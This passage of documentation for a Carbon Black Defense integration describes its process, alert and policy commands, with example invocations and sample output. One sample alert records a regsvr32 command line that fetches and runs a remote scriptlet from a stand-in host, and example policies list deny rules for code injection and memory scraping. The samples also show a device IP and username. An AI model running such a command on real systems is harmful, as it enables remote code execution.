| DeviceDetails DeviceHostName | |
| DeviceDetails DeviceId | 844355 |
| DeviceDetails DeviceIpAddress | 67.143.208.113 |
| DeviceDetails DeviceIpV4Address | 67.143.208.113 |
| DeviceDetails DeviceLocation AreaCode | 0 |
| DeviceDetails DeviceLocation City | |
| DeviceDetails DeviceLocation CountryCode | US |
| DeviceDetails DeviceLocation CountryName | United States |
| DeviceDetails DeviceLocation DmaCode | 0 |
| DeviceDetails DeviceLocation Latitude | 37.751007 |
| DeviceDetails DeviceLocation Longitude | -97.822 |
| DeviceDetails DeviceLocation MetroCode | 0 |
| DeviceDetails DeviceLocation PostalCode | |
| DeviceDetails DeviceLocation Region | |
| DeviceDetails DeviceName | cberninger-mac2 |
| DeviceDetails DeviceType | MAC |
| DeviceDetails DeviceVersion | MAC OS X 10.10.5 |
| DeviceDetails Email | cberninger |
Get multiple processes
Returns the details of multiple process, as specified by further input.
Base Command
cbd-find-processes
Input
| Parameter | Description | More Information |
| hostNameExact | The exact hostname. | Case sensitive. |
| ownerName | Case insensitive owner name. | Case in sensitive. |
| ownerNameExact |
Exact owner name |
Case sensitive. |
| ipAddress | External or internal IP address | - |
| searchWindow |
Events generated within a given time frame |
Default is one day. Events may not be available after 30 days due to retention policies. |
| start | Shows result from this row and after | - |
| rows | Maximum number of rows of result | This parameter can be limited on the Cb Defense server side. |
Context Output
| Path | Description |
| CarbonBlackDefense.GetProcesses.ApplicationName | Application name |
| CarbonBlackDefense.GetProcesses.ProcessId | Process ID |
| CarbonBlackDefense.GetProcesses.NumEvents | Number of events |
| CarbonBlackDefense.GetProcesses.ApplicationPath | Application path |
| CarbonBlackDefense.GetProcesses.PrivatePid | Private PID |
| CarbonBlackDefense.GetProcesses.Sha256Hash | SHA-256 hash |
| CarbonBlackDefense.GetProcesses.TotalResults | Total results |
Command Example
!cbd-find-processes ipAddress="67.143.208.113" rows=2
Context Example
CarbonBlackDefense:{} 1 item
GetProcesses:[] 3 items
0:{} 6 items
ApplicationName:Google Chrome
ApplicationPath:/Applications/Google Chrome.app/Contents/MacOS/Google Chrome
NumEvents:3580
PrivatePid:81577-1533502547808-202
ProcessId:81577
Sha256Hash:19509e92f048f64692a3bc8786f7e74906541c4b548964c69a22ad9e44e43a2d
1:{} 6 items
ApplicationName:cloud-drive-ui
ApplicationPath:/Users/cberninger/.CloudStation/CloudStation.app/Contents/MacOS/cloud-drive-ui
NumEvents:2038
PrivatePid:1071-1533502548722-245
ProcessId:1071
Sha256Hash:f649ce0c8d5ca63be86e00877632c6390af772eed86c07b3db5b818c30ab700b
2:{} 1 item
TotalResults:2
Human Readable Output
| ApplicationName | ApplicationPath | NumEvents | PrivatePid | ProcessId | Sha256Hash |
|---|---|---|---|---|---|
| Google Chrome | /Applications/Google Chrome.app/Contents/MacOS/Google Chrome | 3580 | 81577-1533502547808-202 | 81577 | 19509e92f048f64692a3bc8786f7e74906541c4b548964c69a22ad9e44e43a2d |
| cloud-drive-ui | /Users/cberninger/.CloudStation/CloudStation.app/Contents/MacOS/cloud-drive-ui | 2038 | 1071-1533502548722-245 | 1071 | f649ce0c8d5ca63be86e00877632c6390af772eed86c07b3db5b818c30ab700b |
Get alert details
Returns the details of a specified alert.
Base Command
cbd-get-alert-details
Input
| Parameter | Description |
| alertId | Alert ID |
Context Output
| Path | Description |
| CarbonBlackDefense.GetAlertDetails.DeviceInfo.DeviceType | Device type |
| CarbonBlackDefense.GetAlertDetails.DeviceInfo.Group | Group |
| CarbonBlackDefense.GetAlertDetails.DeviceInfo.GroupId | Group ID |
| CarbonBlackDefense.GetAlertDetails.DeviceInfo.RegisteredTime | Registered time |
| CarbonBlackDefense.GetAlertDetails.DeviceInfo.DeviceId | Device ID |
| CarbonBlackDefense.GetAlertDetails.DeviceInfo.DeviceName | Device name |
| CarbonBlackDefense.GetAlertDetails.DeviceInfo.Status | Status |
| CarbonBlackDefense.GetAlertDetails.DeviceInfo.OsVersion | OS version |
| CarbonBlackDefense.GetAlertDetails.DeviceInfo.SensorVersion | Sensor version |
| CarbonBlackDefense.GetAlertDetails.DeviceInfo.UserName | User name |
| CarbonBlackDefense.GetAlertDetails.DeviceInfo.Importance | Importance |
| CarbonBlackDefense.GetAlertDetails.DeviceInfo.Message | Message |
| CarbonBlackDefense.GetAlertDetails.DeviceInfo.Success | Success |
| CarbonBlackDefense.GetAlertDetails.Events.ParentHash | Parent hash |
| CarbonBlackDefense.GetAlertDetails.Events.PolicyState | Policy state |
| CarbonBlackDefense.GetAlertDetails.Events.LongDescription | Long description |
| CarbonBlackDefense.GetAlertDetails.Events.ParentPid | Parent PID |
| CarbonBlackDefense.GetAlertDetails.Events.ProcessId | Process ID |
| CarbonBlackDefense.GetAlertDetails.Events.ThreatIndicators | Threat indicators |
| CarbonBlackDefense.GetAlertDetails.Events.ApplicationPath | Application path |
| CarbonBlackDefense.GetAlertDetails.Events.ProcessHash | Process hash |
| CarbonBlackDefense.GetAlertDetails.Events.ProcessMd5Hash | Process MD5 hash |
| CarbonBlackDefense.GetAlertDetails.Events.EventId | Event ID |
| CarbonBlackDefense.GetAlertDetails.Events.EventTime | Event time |
| CarbonBlackDefense.GetAlertDetails.Events.EventType | Event type |
| CarbonBlackDefense.GetAlertDetails.Events.KillChainStatus | Kill chain status |
| CarbonBlackDefense.GetAlertDetails.Events.ParentName | Parent name |
| CarbonBlackDefense.GetAlertDetails.Events.ParentPPid | ParentP PID |
| CarbonBlackDefense.GetAlertDetails.Events.ProcessPPid | ProcessP PID |
| CarbonBlackDefense.GetAlertDetails.ThreatInfo.IncidentId | Incident ID |
| CarbonBlackDefense.GetAlertDetails.ThreatInfo.Indicators.ApplicationName | Application name |
| CarbonBlackDefense.GetAlertDetails.ThreatInfo.Indicators.IndicatorName | Indicator name |
| CarbonBlackDefense.GetAlertDetails.ThreatInfo.Indicators.Sha256Hash | SHA-256 hash |
| CarbonBlackDefense.GetAlertDetails.ThreatInfo.Summary | Summary |
| CarbonBlackDefense.GetAlertDetails.ThreatInfo.ThreatId | Threat ID |
| CarbonBlackDefense.GetAlertDetails.ThreatInfo.ThreatScore | Threat score |
| CarbonBlackDefense.GetAlertDetails.ThreatInfo.Time | Time |
Command Example
!cbd-get-alert-details alertId=HWOXYQ6P
Context Example
Account:{} 2 items
CarbonBlackDefense:{} 2 items
GetAlertDetails:{} 1 item
DeviceInfo:{} 4 items
DeviceInfo:{} 13 items
DeviceName:ECIADWS7
Success:true
Message:success
RegisteredTime:1525879595477
DeviceType:WINDOWS
DeviceId:896327
Status:REGISTERED
OsVersion:Windows 7 x86 SP: 1
Importance:MEDIUM
UserName:EVILCORP\Expel
GroupId:0
SensorVersion:3.1.0.100
Group:null
Events:{} 17 items
OrgId:1105
ThreatInfo:{} 6 items
IncidentId:HWOXYQ6P
Indicators:{} 3 items
ApplicationName:[] 64 items
IndicatorName:[] 64 items
Sha256Hash:[] 64 items
Summary:The application regsvr32.exe is executing an encoded fileless script.
ThreatId:218c1859d76eb42113590f9da21e2cec
ThreatScore:5
Time:1533253999790
GetProcesses:[] 3 items
0:{} 6 items
ApplicationName:Google Chrome
ApplicationPath:/Applications/Google Chrome.app/Contents/MacOS/Google Chrome
NumEvents:3580
PrivatePid:81577-1533502547808-202
ProcessId:81577
Sha256Hash:19509e92f048f64692a3bc8786f7e74906541c4b548964c69a22ad9e44e43a2d
1:{} 6 items
ApplicationName:cloud-drive-ui
ApplicationPath:/Users/cberninger/.CloudStation/CloudStation.app/Contents/MacOS/cloud-drive-ui
NumEvents:2038
PrivatePid:1071-1533502548722-245
ProcessId:1071
Sha256Hash:f649ce0c8d5ca63be86e00877632c6390af772eed86c07b3db5b818c30ab700b
2:{} 1 item
TotalResults:2
Endpoint:{} 2 items
Hostname:ECIADWS7
OS:WINDOWS
Process:{} 7 items
CommandLine:regsvr32.exe /s /u /i:http://example.com/file.sct scrobj.dll
Endpoint:ECIADWS7
MD5:432be6cf7311062633459eef6b242fb5
PID:12804
ParentID:10808
ParentName:alert_generator.bat
Path:C:\Windows\System32\regsvr32.exe
Get all policy details.
Returns the details of all policies. the details
Base Command
cbd-get-policies
Input
There is no input for this command.
Context Output
| Path | Description |
| CarbonBlackDefense.GetPolicies.Id | The policy ID |
| CarbonBlackDefense.GetPolicies.PriorityLevel | The policy's priority level |
| CarbonBlackDefense.GetPolicies.SystemPolicy | System policy ( boolean ) |
| CarbonBlackDefense.GetPolicies.LatestRevision | The policy's latest revision |
| CarbonBlackDefense.GetPolicies.Policy | The policy object |
Command Example
!cbd-get-policies
Context Example
CarbonBlackDefense:{} 1 item
GetPolicies:[] 40 items
0:{} 5 items
Id:6525
LatestRevision:1488926710902
Policy:{} 6 items
avSettings:{} 6 items
apc:{} 4 items
enabled:false
maxExeDelay:45
maxFileSize:4
riskLevel:4
features:[] 3 items
0:{} 2 items
enabled:false
name:SIGNATURE_UPDATE
1:{} 2 items
enabled:false
name:ONACCESS_SCAN
2:{} 2 items
enabled:true
name:ONDEMAND_SCAN
onAccessScan:{} 1 item
profile:NORMAL
onDemandScan:{} 4 items
profile:NORMAL
scanCdDvd:AUTOSCAN
scanUsb:AUTOSCAN
schedule:{} 4 items
days:null
rangeHours:0
recoveryScanIfMissed:true
startHour:0
signatureUpdate:{} 1 item
schedule:{} 3 items
fullIntervalHours:0
initialRandomDelayHours:4
intervalHours:4
updateServers:{} 2 items
servers:[] 1 item
0:{} 3 items
flags:0
regId:null
server:[] 1 item
0:http://updates.cdc.carbonblack.io/update
serversForOffSiteDevices:[] 1 item
0:http://updates.cdc.carbonblack.io/update
directoryActionRules:[] 0 items
id:-1
knownBadHashAutoDeleteDelayMs:null
rules:[] 0 items
sensorSettings:[] 24 items
0:{} 2 items
name:ALLOW_UNINSTALL
value:true
1:{} 2 items
name:ALLOW_UPLOADS
value:false
2:{} 2 items
name:SHOW_UI
value:false
3:{} 2 items
name:ENABLE_THREAT_SHARING
value:true
4:{} 2 items
name:QUARANTINE_DEVICE
value:false
5:{} 2 items
name:LOGGING_LEVEL
value:NORMAL
6:{} 2 items
name:QUARANTINE_DEVICE_MESSAGE
value:Your device has been quarantined. Please contact your administrator.
7:{} 2 items
name:SET_SENSOR_MODE
value:0
8:{} 2 items
name:SENSOR_RESET
value:0
9:{} 2 items
name:BACKGROUND_SCAN
value:false
10:{} 2 items
name:POLICY_ACTION_OVERRIDE
value:true
11:{} 2 items
name:HELP_MESSAGE
value:
12:{} 2 items
name:PRESERVE_SYSTEM_MEMORY_SCAN
value:false
13:{} 2 items
name:HASH_MD5
value:false
14:{} 2 items
name:SCAN_LARGE_FILE_READ
value:false
15:{} 2 items
name:SCAN_EXECUTE_ON_NETWORK_DRIVE
value:false
16:{} 2 items
name:DELAY_EXECUTE
value:false
17:{} 2 items
name:SCAN_NETWORK_DRIVE
value:false
18:{} 2 items
name:BYPASS_AFTER_LOGIN_MINS
value:0
19:{} 2 items
name:BYPASS_AFTER_RESTART_MINS
value:0
20:{} 2 items
name:SHOW_FULL_UI
value:false
21:{} 2 items
name:SECURITY_CENTER_OPT
value:false
22:{} 2 items
name:CB_LIVE_RESPONSE
value:false
23:{} 2 items
name:UNINSTALL_CODE
value:false
PriorityLevel:MEDIUM
SystemPolicy:true
Get the details of a specified policy
Returns the details of a specified policy.
Base Command
cbd-get-policy
Input
| Parameter | Description |
| policyId | Policy ID |
Context Output
| Path | Description |
| CarbonBlackDefense.GetPolicy.Id | The policy ID |
| CarbonBlackDefense.GetPolicy.PriorityLevel | The policy's priority level |
| CarbonBlackDefense.GetPolicy.SystemPolicy | System policy ( boolean ) |
| CarbonBlackDefense.GetPolicy.LatestRevision | The policy's latest revision |
| CarbonBlackDefense.GetPolicy.Policy | The policy object |
Command Example
!cbd-get-policy policyId=6525
Context Example
CarbonBlackDefense:{} 1 item
GetPolicy:{} 5 items
Id:6525
LatestRevision:1488926710902
Policy:{} 6 items
avSettings:{} 6 items
apc:{} 4 items
enabled:false
maxExeDelay:45
maxFileSize:4
riskLevel:4
features:[] 3 items
0:{} 2 items
enabled:false
name:SIGNATURE_UPDATE
1:{} 2 items
enabled:false
name:ONACCESS_SCAN
2:{} 2 items
enabled:true
name:ONDEMAND_SCAN
onAccessScan:{} 1 item
profile:NORMAL
onDemandScan:{} 4 items
profile:NORMAL
scanCdDvd:AUTOSCAN
scanUsb:AUTOSCAN
schedule:{} 4 items
days:null
rangeHours:0
recoveryScanIfMissed:true
startHour:0
signatureUpdate:{} 1 item
schedule:{} 3 items
fullIntervalHours:0
initialRandomDelayHours:4
intervalHours:4
updateServers:{} 2 items
servers:[] 1 item
0:{} 3 items
flags:0
regId:null
server:[] 1 item
0:http://updates.cdc.carbonblack.io/update
serversForOffSiteDevices:[] 1 item
0:http://updates.cdc.carbonblack.io/update
directoryActionRules:[] 0 items
id:-1
knownBadHashAutoDeleteDelayMs:null
rules:[] 0 items
sensorSettings:[] 24 items
0:{} 2 items
name:ALLOW_UNINSTALL
value:true
1:{} 2 items
name:ALLOW_UPLOADS
value:false
2:{} 2 items
name:SHOW_UI
value:false
3:{} 2 items
name:ENABLE_THREAT_SHARING
value:true
4:{} 2 items
name:QUARANTINE_DEVICE
value:false
5:{} 2 items
name:LOGGING_LEVEL
value:NORMAL
6:{} 2 items
name:QUARANTINE_DEVICE_MESSAGE
value:Your device has been quarantined. Please contact your administrator.
7:{} 2 items
name:SET_SENSOR_MODE
value:0
8:{} 2 items
name:SENSOR_RESET
value:0
9:{} 2 items
name:BACKGROUND_SCAN
value:false
10:{} 2 items
name:POLICY_ACTION_OVERRIDE
value:true
11:{} 2 items
name:HELP_MESSAGE
value:
12:{} 2 items
name:PRESERVE_SYSTEM_MEMORY_SCAN
value:false
13:{} 2 items
name:HASH_MD5
value:false
14:{} 2 items
name:SCAN_LARGE_FILE_READ
value:false
15:{} 2 items
name:SCAN_EXECUTE_ON_NETWORK_DRIVE
value:false
16:{} 2 items
name:DELAY_EXECUTE
value:false
17:{} 2 items
name:SCAN_NETWORK_DRIVE
value:false
18:{} 2 items
name:BYPASS_AFTER_LOGIN_MINS
value:0
19:{} 2 items
name:BYPASS_AFTER_RESTART_MINS
value:0
20:{} 2 items
name:SHOW_FULL_UI
value:false
21:{} 2 items
name:SECURITY_CENTER_OPT
value:false
22:{} 2 items
name:CB_LIVE_RESPONSE
value:false
23:{} 2 items
name:UNINSTALL_CODE
value:false
PriorityLevel:MEDIUM
SystemPolicy:true
Human Readable Output
| Id | 6525 |
|---|---|
| LatestRevision | 1488926710902 |
| Policy | {"rules":[],"id":-1,"sensorSettings":[{"name":"ALLOW_UNINSTALL","value":"true"},{"name":"ALLOW_UPLOADS","value":"false"},{"name":"SHOW_UI","value":"false"},{"name":"ENABLE_THREAT_SHARING","value":"true"},{"name":"QUARANTINE_DEVICE","value":"false"},{"name":"LOGGING_LEVEL","value":"NORMAL"},{"name":"QUARANTINE_DEVICE_MESSAGE","value":"Your device has been quarantined. Please contact your administrator."},{"name":"SET_SENSOR_MODE","value":"0"},{"name":"SENSOR_RESET","value":"0"},{"name":"BACKGROUND_SCAN","value":"false"},{"name":"POLICY_ACTION_OVERRIDE","value":"true"},{"name":"HELP_MESSAGE","value":""},{"name":"PRESERVE_SYSTEM_MEMORY_SCAN","value":"false"},{"name":"HASH_MD5","value":"false"},{"name":"SCAN_LARGE_FILE_READ","value":"false"},{"name":"SCAN_EXECUTE_ON_NETWORK_DRIVE","value":"false"},{"name":"DELAY_EXECUTE","value":"false"},{"name":"SCAN_NETWORK_DRIVE","value":"false"},{"name":"BYPASS_AFTER_LOGIN_MINS","value":"0"},{"name":"BYPASS_AFTER_RESTART_MINS","value":"0"},{"name":"SHO ...http://updates.cdc.carbonblack.io/update"],"servers":[{"server":["http://updates.cdc.carbonblack.io/update"],"flags":0,"regId":null}]},"apc":{"maxFileSize":4,"maxExeDelay":45,"riskLevel":4,"enabled":false},"onAccessScan":{"profile":"NORMAL"},"onDemandScan":{"profile":"NORMAL","scanCdDvd":"AUTOSCAN","scanUsb":"AUTOSCAN","schedule":{"days":null,"rangeHours":0,"startHour":0,"recoveryScanIfMissed":true}},"signatureUpdate":{"schedule":{"intervalHours":4,"fullIntervalHours":0,"initialRandomDelayHours":4}}},"knownBadHashAutoDeleteDelayMs":null,"directoryActionRules":[]} |
| PriorityLevel | MEDIUM |
| SystemPolicy | true |
Create a policy
Creates a policy, as prescribed by further input.
Base Command
cbd-create-policy
Input
| Parameter | Description |
| description | Policy description |
| name | A single line name for the policy |
| priorityLevel | Priority score associated with sensors assigned to this policy |
| policy |
JSON object containing the policy details. Make sure a valid policy object is passed:
|
Context Output
| Path | Description |
| CarbonBlackDefense.CreatePolicy.PolicyId | The new policy ID |
Command Example
!cbd-create-policy priorityLevel=LOW name=YARDENTEST3 description=yardentesttest3 policy={ "policyInfo": { "description": "test policy for documentation", "name": "documentation test", "policy": { "avSettings": { "apc": { "enabled": false, "maxExeDelay": 45, "maxFileSize": 4, "riskLevel": 4 }, "features": [ { "enabled": false, "name": "SIGNATURE_UPDATE" }, { "enabled": true, "name": "ONACCESS_SCAN" }, { "enabled": true, "name": "ONDEMAND_SCAN" } ], "onAccessScan": { "profile": "NORMAL" }, "onDemandScan": { "profile": "NORMAL", "scanCdDvd": "AUTOSCAN", "scanUsb": "AUTOSCAN", "schedule": { "days": null, "rangeHours": 0, "recoveryScanIfMissed": true, "startHour": 0 } }, "signatureUpdate": { "schedule": { "fullIntervalHours": 0, "initialRandomDelayHours": 4, "intervalHours": 2 } }, "updateServers": { "servers": [ { "flags": 0, "regId": null, "server": [ "http://updates.cdc.carbonblack.io/update" ] } ], "serversForOffSiteDevices": [ "http://updates.cdc.carbonblack.io/update" ] } }, "directoryActionRules": [ { "actions": { "FILE_UPLOAD": false, "PROTECTION": false }, "path": "C:\\FXCM\\**" }, { "actions": { "FILE_UPLOAD": true, "PROTECTION": false }, "path": "sadf" }, { "actions": { "FILE_UPLOAD": true, "PROTECTION": false }, "path": "/Users/**" } ], "id": -1, "rules": [ { "action": "DENY", "application": { "type": "REPUTATION", "value": "KNOWN_MALWARE" }, "id": 1, "operation": "RUN", "required": true }, { "action": "DENY", "application": { "type": "REPUTATION", "value": "COMPANY_BLACK_LIST" }, "id": 2, "operation": "RUN", "required": true }, { "action": "DENY", "application": { "type": "REPUTATION", "value": "KNOWN_MALWARE" }, "id": 3, "operation": "NETWORK", "required": false }, { "action": "TERMINATE", "application": { "type": "REPUTATION", "value": "ADAPTIVE_WHITE_LIST" }, "id": 5, "operation": "RANSOM", "required": false }, { "action": "IGNORE", "application": { "type": "NAME_PATH", "value": "**\\devenv.exe" }, "id": 4, "operation": "RANSOM", "required": false }, { "action": "DENY", "application": { "type": "NAME_PATH", "value": "%SystemDrive%\\Windows\\System32\\notepad2.exe" }, "id": 10, "operation": "RUN", "required": false }, { "action": "DENY", "application": { "type": "REPUTATION", "value": "KNOWN_MALWARE" }, "id": 11, "operation": "RANSOM", "required": true }, { "action": "DENY", "application": { "type": "REPUTATION", "value": "KNOWN_MALWARE" }, "id": 13, "operation": "MEMORY_SCRAPE", "required": false }, { "action": "DENY", "application": { "type": "REPUTATION", "value": "KNOWN_MALWARE" }, "id": 14, "operation": "CODE_INJECTION", "required": false }, { "action": "DENY", "application": { "type": "REPUTATION", "value": "KNOWN_MALWARE" }, "id": 15, "operation": "RUN_INMEMORY_CODE", "required": false }, { "action": "DENY", "application": { "type": "REPUTATION", "value": "KNOWN_MALWARE" }, "id": 17, "operation": "POL_INVOKE_NOT_TRUSTED", "required": false }, { "action": "DENY", "application": { "type": "REPUTATION", "value": "KNOWN_MALWARE" }, "id": 18, "operation": "INVOKE_CMD_INTERPRETER", "required": false }, { "action": "DENY", "application": { "type": "REPUTATION", "value": "KNOWN_MALWARE" }, "id": 20, "operation": "INVOKE_SCRIPT", "required": false }, { "action": "DENY", "application": { "type": "REPUTATION", "value": "RESOLVING" }, "id": 22, "operation": "RUN", "required": false }, { "action": "DENY", "application": { "type": "REPUTATION", "value": "PUP" }, "id": 23, "operation": "RUN", "required": false }, { "action": "DENY", "application": { "type": "REPUTATION", "value": "SUSPECT_MALWARE" }, "id": 24, "operation": "RUN", "required": false }, { "action": "DENY", "application": { "type": "REPUTATION", "value": "ADAPTIVE_WHITE_LIST" }, "id": 25, "operation": "NETWORK", "required": false }, { "action": "ALLOW", "application": { "type": "NAME_PATH", "value": "c:\\test\\**" }, "id": 26, "operation": "INVOKE_SCRIPT", "required": false } ], "sensorSettings": [ { "name": "SHOW_UI", "value": "true" }, { "name": "BACKGROUND_SCAN", "value": "true" }, { "name": "POLICY_ACTION_OVERRIDE", "value": "true" }, { "name": "QUARANTINE_DEVICE_MESSAGE", "value": "Your device has been quarantined by your computer administrator." }, { "name": "LOGGING_LEVEL", "value": "false" }, { "name": "ALLOW_UNINSTALL", "value": "true" }, { "name": "QUARANTINE_DEVICE", "value": "false" }, { "name": "RATE_LIMIT", "value": "0" }, { "name": "CONNECTION_LIMIT", "value": "0" }, { "name": "QUEUE_SIZE", "value": "100" }, { "name": "LEARNING_MODE", "value": "0" }, { "name": "SCAN_NETWORK_DRIVE", "value": "true" }, { "name": "BYPASS_AFTER_LOGIN_MINS", "value": "0" }, { "name": "BYPASS_AFTER_RESTART_MINS", "value": "0" }, { "name": "SCAN_EXECUTE_ON_NETWORK_DRIVE", "value": "true" }, { "name": "DELAY_EXECUTE", "value": "true" }, { "name": "PRESERVE_SYSTEM_MEMORY_SCAN", "value": "false" }, { "name": "HASH_MD5", "value": "false" }, { "name": "SCAN_LARGE_FILE_READ", "value": "false" }, { "name": "SHOW_FULL_UI", "value": "true" }, { "name": "HELP_MESSAGE", "value": "CarbonBlack" }, { "name": "SECURITY_CENTER_OPT", "value": "true" }, { "name": "CB_LIVE_RESPONSE", "value": "true" }, { "name": "UNINSTALL_CODE", "value": "false" } ] }, "priorityLevel": "LOW", "version": 2 } }
Context Example
CarbonBlackDefense:{} 1 item
CreatePolicy:{} 1 item
PolicyId:21356
Human Readable Output
| PolicyId | 21356 |
|---|
Update a policy
Updates an existing policy.
Base Command
cbd-update-policy
Input
| Parameter | Description |
| description | Policy description |
| name | A single line name for the policy |
| priorityLevel | Priority score associated with sensors assigned to this policy. |
| id |
The ID of the policy to update. |
| policy |
JSON object containing the policy details. Make sure a valid policy object is passed:
|
Context Output
There is no context output for this command.
Command Example
!cbd-update-policy id=21355 priorityLevel=LOW description="woot" name="boot" policy={"knownBadHashAutoDeleteDelayMs":null,"directoryActionRules":[],"rules":[],"id":-1,"sensorSettings":[{"name":"ALLOW_UNINSTALL","value":"true"},{"name":"ALLOW_UPLOADS","value":"false"},{"name":"SHOW_UI","value":"false"},{"name":"ENABLE_THREAT_SHARING","value":"true"},{"name":"QUARANTINE_DEVICE","value":"false"},{"name":"LOGGING_LEVEL","value":"NORMAL"},{"name":"QUARANTINE_DEVICE_MESSAGE","value":"Your device has been quarantined. Please contact your administrator."},{"name":"SET_SENSOR_MODE","value":"0"},{"name":"SENSOR_RESET","value":"0"},{"name":"BACKGROUND_SCAN","value":"false"},{"name":"POLICY_ACTION_OVERRIDE","value":"true"},{"value":"","name":"HELP_MESSAGE"},{"value":"false","name":"PRESERVE_SYSTEM_MEMORY_SCAN"},{"value":"false","name":"HASH_MD5"},{"name":"SCAN_LARGE_FILE_READ","value":"false"},{"name":"SCAN_EXECUTE_ON_NETWORK_DRIVE","value":"false"},{"name":"DELAY_EXECUTE","value":"false"},{"name":"SCAN_NETWORK_DRIVE","value":"false"},{"name":"BYPASS_AFTER_LOGIN_MINS","value":"0"},{"name":"BYPASS_AFTER_RESTART_MINS","value":"0"},{"name":"SHOW_FULL_UI","value":"false"},{"name":"SECURITY_CENTER_OPT","value":"false"},{"name":"CB_LIVE_RESPONSE","value":"false"},{"name":"UNINSTALL_CODE","value":"false"}],"avSettings":{"signatureUpdate":{"schedule":{"initialRandomDelayHours":4,"fullIntervalHours":0,"intervalHours":4}},"features":[{"enabled":false,"name":"SIGNATURE_UPDATE"},{"enabled":false,"name":"ONACCESS_SCAN"},{"name":"ONDEMAND_SCAN","enabled":true}],"updateServers":{"servers":[{"flags":0,"regId":null,"server":["http://updates.cdc.carbonblack.io/update"]}],"serversForOffSiteDevices":["http://updates.cdc.carbonblack.io/update"]},"apc":{"maxExeDelay":45,"riskLevel":4,"enabled":false,"maxFileSize":4},"onAccessScan":{"profile":"NORMAL"},"onDemandScan":{"profile":"NORMAL","scanCdDvd":"AUTOSCAN","scanUsb":"AUTOSCAN","schedule":{"startHour":0,"recoveryScanIfMissed":true,"days":null,"rangeHours":0}}}}
Human Readable Output
Request Success
Delete a policy
Deletes a specified policy.
Base Command
cbd-delete-policy
Input
| Parameter | Description |
| policyId | Policy ID |
Context Output
There is no context output for this command.
Human Readable Output
Request Success
Add a rule to a policy
Adds a specified rule to a specified policy.
Base Command
cbd-add-rule-to-policy
Input
| Parameter | Description |
| action | Rule action |
| operation | Rule operation |
| required | Rule required |
| id | Rule ID |
| type | Application type |
| value | Application value |
| policyId | Policy ID |
Context Output
There is no context output for this command.
Command Example
!cbd-add-rule-to-policy action="TERMINATE" id="7777" operation="RANSOM" required="false" type="REPUTATION" policyId="21355" value="COMPANY_BLACK_LIST"
Human Readable Output
Request Success
Delete a rule from a policy
Deletes a specified rule from a specified policy.
Base Command
cbd-delete-rule-from-policy
Input
| Parameter | Description |
| policyId | ID of the policy to delete the rule from |
| ruleId | ID of the rule to delete |
Context Output
There is no context output for this command.
Command Example
!cbd-delete-rule-from-policy ruleId=2 policyId=21355
Human Readable Output
Request Success
Update a rule in a policy
Updates a rule in a specified policy.
Base Command
cbd-update-rule-in-policy
Input
| Parameter | Description |
| action | Rule action |
| operation | Rule operation |
| required | Rule required |
| id | Rule ID |
| type | Application type |
| value | Application value |
| policyId | Policy ID |
Context Output
There is no context output for this command.
Command Example
!cbd-update-rule-in-policy action="TERMINATE" id=1 operation=RANSOM policyId=21355 required=false type=REPUTATION value=COMPANY_BLACK_LIST
Human Readable Output
Request Success
Set a policy
Sets a specified policy.
Base Command
cbd-set-policy
Input
| Parameter | Description |
| keyValue |
A JSON object that holds key-value pairs. Key is the field path in the policy object to update with value. |
| policy |
The policy to set. |
Context Output
There is no context output for this command.